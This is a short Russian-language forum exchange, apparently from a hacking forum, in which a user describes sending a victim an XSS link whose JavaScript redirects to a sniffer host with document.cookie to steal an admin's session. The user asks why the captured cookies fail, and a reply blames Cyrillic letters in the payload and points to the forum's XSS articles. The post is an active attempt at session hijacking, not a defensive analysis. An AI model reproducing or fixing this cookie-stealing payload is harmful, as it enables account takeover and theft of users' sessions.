↑
Эксплуатирую XSS и тут появился такой вопрос. Отправляю ссылку жертве с этим кодом
document.location.replace(%27 http://доменснифера.ком/sniff.php?с=doсument.сookie%27
) и в логах появляется это - %C3%B1=do%C3%B1ument.%C3%B1ookie
Все делаю как надо, а куки левые приходят, вставлял их в браузер и не получилось зайти от админа. Подскажите, в чем загвоздка?
у вас неверный код, который отправляет куки на сниффер. да еще и с русскими буквами внутри. прочитайте статью про XSS в разделе статей, там корректные примеры